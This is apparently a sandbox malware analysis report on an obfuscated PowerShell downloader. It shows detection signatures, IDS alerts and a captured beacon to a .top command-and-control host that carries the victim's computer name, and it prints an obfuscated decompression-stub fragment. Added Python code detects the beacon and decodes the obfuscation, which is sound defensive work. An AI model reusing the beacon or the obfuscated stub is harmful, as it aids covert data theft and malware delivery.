

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579001
MD5:506d528176abebda1202676b0528e974
SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 5908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5908, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5908, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:41:13.852263+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.30 | 49845 | 23.50.114.17 | 443 | TCP
2024-12-20T17:42:17.415778+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.30 | 49853 | 23.50.114.17 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:41:14.563032+0100 | 2859391 | 1 | Domain Observed Used for C2 Detected | 192.168.11.30 | 58409 | 1.1.1.1 | 53 | UDP

Source: Binary string: softy.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643068475958.000001A73D8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.643067001006.000001A73B958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000001.00000002.643109845142.000001A756134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: powershell.exe, 00000001.00000002.643108718460.000001A755E51000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.30:58409 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: Joe Sandbox View | IP Address: 45.61.136.138
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49845 -> 23.50.114.17:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49853 -> 23.50.114.17:443
Source: global traffic | HTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8ZMFQDummoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=eJyEIlHRWOrNmm3PTfwJw7iwIju0uTydR31wGf9D4xQtRSSd97A4zZ5x3kPQqfFsCXGTC0yCOtlfajGLNwzwaoBiykAYmqk9UekyKLvgh04i65ztx-VWhPgBuVrvInEoh1aTs0rbdhXVKODQvJCy3nWDwuLQhcY1Az8Z_YXbaO539d7qOm6BY9trt1KtMh26-WfX
Source: global traffic | DNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EF06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E722000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EB8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527p
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.643068475958.000001A73D91C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000001.00000002.643109343926.000001A7560EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzS
Source: powershell.exe, 00000001.00000002.643105261034.000001A755B4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic8
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzS
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcKU9YrAJcCWhHGsV4aZMY6n32LOTDW9zFDpHXZFok_V8Z
Source: powershell.exe, 00000001.00000002.643068895319.000001A73E873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGKu8lrsGIjCNX0YnvltuKPcK
Source: powershell.exe, 00000001.00000002.643106506815.000001A755DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DAC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.643068895319.000001A73DCEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzS
Source: powershell.exe, 00000001.00000002.643097578740.000001A74DB36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.643068895319.000001A73EC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73E888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.643068895319.000001A73EC3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js
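The networking evidence above fits together: the script first issues a bare GET to www.google.com with the default Invoke-WebRequest user agent (the "WindowsPowerShell/5.1.19041.1151" suffix is the giveaway; Google answered with its /sorry CAPTCHA page, which is how it treats automated clients), then beacons to the hard-coded .top host. The template string recovered from memory, http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527, shows that id carries the hostname, key a numeric token and s the literal 527. The following detector is an added example written for this report, not code from the sample or from Joe Sandbox; the log line format and the non-malicious lines are constructed, and the path length bounds in BEACON_PATH_RE are an assumption generalised from the one observed path.

```python
"""Flag PowerShell-originated HTTP requests whose URL matches the beacon shape
seen in this report. Added example for the sandbox report; not the sample's code."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines in the form:  <src ip> <method> <url> "<user agent>"
# The first two reproduce the requests the sandbox captured; the rest are benign
# traffic made up to show what must NOT fire.
LOG_LINES = [
    '192.168.11.30 GET http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151"',
    '192.168.11.30 GET http://www.google.com/ '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151"',
    '192.168.11.31 GET https://www.google.com/ '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36"',
    '192.168.11.32 GET https://www.powershellgallery.com/api/v2/ '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151"',
]

LINE_RE = re.compile(r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

# Beacon shape from the template string found in memory:
#   /<random name>.php?id=$env:computername&key=<token>&s=527
# The 8..20 character bound on the name is an assumption; the report shows one
# 13-character instance (kzqvgnd7b0htr).
BEACON_PATH_RE = re.compile(r"^/[a-z0-9]{8,20}\.php$")
BEACON_PARAMS = {"id", "key", "s"}


def classify(line: str) -> list[str]:
    """Return the tags a single request line earns, in a fixed order."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    url = urlsplit(m["url"])
    query = parse_qs(url.query)
    tags: list[str] = []

    # Default Invoke-WebRequest / WebClient UA as observed in the capture.
    ps_ua = "WindowsPowerShell/" in m["ua"]
    if ps_ua:
        tags.append("powershell-ua")
        # Bare GET / to Google from a non-browser: the connectivity check the
        # report lists as "Queries Google from non browser process".
        if url.hostname and url.hostname.endswith("google.com") and url.path in ("", "/"):
            tags.append("connectivity-check")

    # URL matches the recovered template regardless of host, so a rotated
    # domain with the same server-side script still trips it.
    if (
        BEACON_PATH_RE.match(url.path)
        and set(query) == BEACON_PARAMS
        and query["key"][0].isdigit()
        and query["s"] == ["527"]
    ):
        tags.append("beacon-shape")

    if ps_ua and "beacon-shape" in tags:
        tags.append("ALERT")
    return tags


def alerts(lines: list[str]) -> list[str]:
    """Lines that carry both the PowerShell UA and the beacon URL shape."""
    return [ln for ln in lines if "ALERT" in classify(ln)]


if __name__ == "__main__":
    for ln in LOG_LINES:
        print(classify(ln), ln[:80])
```

The two signals are kept separate on purpose: a PowerShell user agent alone is common in managed environments (module installs, Gallery traffic), and the URL shape alone could be matched by unrelated PHP endpoints; it is the combination that is worth paging on, while the single tags are useful for hunting.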
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B088C92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B087EE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B07C7DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFA7B080E1D
Source: classification engine | Classification label: mal64.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_250tzhle.5fo.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) $86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() $cs3pj58qgiuek20=$bxrc2jni4slugvt return $cs3pj58qgiuek20}[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),(2783-(19467520/7264))))))((nghl3ewmdia0bvsr1z6kjfo9x5q "
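The AMSI capture above is the tail of the script's decoding stub. Every method name has been replaced by a character array whose elements are integer arithmetic (([char[]]@(67,111,...) -join ''), [string]::new(@(...)) or a -join over ForEach-Object { [char]$_ }), and the fragment also shows what the names guard: a GZip decompress into a memory stream, ToArray on the result and an ASCII GetString, i.e. the usual compressed-then-decoded second stage. The decoder below is an added example written for this report, not part of the sample or of the sandbox output; it evaluates the arithmetic with a whitelist-only expression walker rather than eval, so it can be run on untrusted captures offline. The SAMPLE string is the fragment above, trimmed just before the call to the script's own helper function; the three wrapper forms it handles are the ones visible in the capture, and nothing else about the script is assumed.

```python
"""Recover method names hidden as integer-arithmetic char codes in obfuscated
PowerShell. Added example for this sandbox report; not the sample's own code."""
from __future__ import annotations

import ast
import operator

# Constructed input: the AMSI-captured stub from the report, trimmed before the
# call to the script's own decoding function so the parentheses balance.
SAMPLE = (
    "$86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),"
    "(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),"
    "(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) "
    "$86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),"
    "(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()"
    "$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),"
    "(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()"
    "[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),"
    "(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),"
    "(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() "
    "[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),"
    "(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),"
    "(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),"
    "(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),"
    "(2783-(19467520/7264))))))"
)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _eval_arith(expr: str) -> int:
    """Evaluate + - * / over integer literals only; anything else is rejected.
    PowerShell's '/' yields a double, and the obfuscator only uses exact
    quotients, so a non-integral result means this was not a char code."""
    def walk(node: ast.AST):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported syntax in char-code expression")
    value = walk(ast.parse(expr, mode="eval"))
    if value != int(value):
        raise ValueError(f"non-integral char code {value!r}")
    return int(value)


def _balanced(text: str, start: int) -> int:
    """Index of the ')' matching the '(' at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced parentheses")


def _split_top_level(body: str) -> list[str]:
    """Split an array body on commas that are not nested in parentheses."""
    parts, cur, depth = [], [], 0
    for ch in body:
        depth += ch == "("
        depth -= ch == ")"
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def decode_char_arrays(snippet: str) -> list[str]:
    """Every @( ... ) literal whose elements are pure arithmetic, as the string
    its char codes spell, in order of appearance. Non-numeric arrays are skipped."""
    out, pos = [], 0
    while (start := snippet.find("@(", pos)) >= 0:
        try:
            end = _balanced(snippet, start + 1)
        except ValueError:
            break  # truncated capture: nothing more can be decoded
        try:
            codes = [_eval_arith(p) for p in _split_top_level(snippet[start + 2:end])]
            out.append("".join(chr(c) for c in codes))
        except (ValueError, SyntaxError, ZeroDivisionError, OverflowError):
            pass
        pos = end + 1
    return out


def rewrite_method_calls(snippet: str) -> str:
    """Turn  $obj.( <expr that spells a name> )(  into  $obj.Name(  wherever the
    expression contains exactly one decodable char array."""
    out, pos = [], 0
    while (idx := snippet.find(".(", pos)) >= 0:
        try:
            end = _balanced(snippet, idx + 1)
        except ValueError:
            break
        names = decode_char_arrays(snippet[idx + 2:end])
        out.append(snippet[pos:idx])
        out.append("." + names[0] if len(names) == 1 and names[0].isidentifier()
                   else snippet[idx:end + 1])
        pos = end + 1
    out.append(snippet[pos:])
    return "".join(out)


if __name__ == "__main__":
    print(decode_char_arrays(SAMPLE))
    print(rewrite_method_calls(SAMPLE))
```

On the captured fragment this yields CopyTo, Close, Close, ToArray and GetString, which reads back as: copy the GZipStream into a MemoryStream, close both, take the bytes and ASCII-decode them. Because only the arithmetic is evaluated, nothing from the script is executed, which is the property you want when triaging a capture rather than detonating it again.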
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
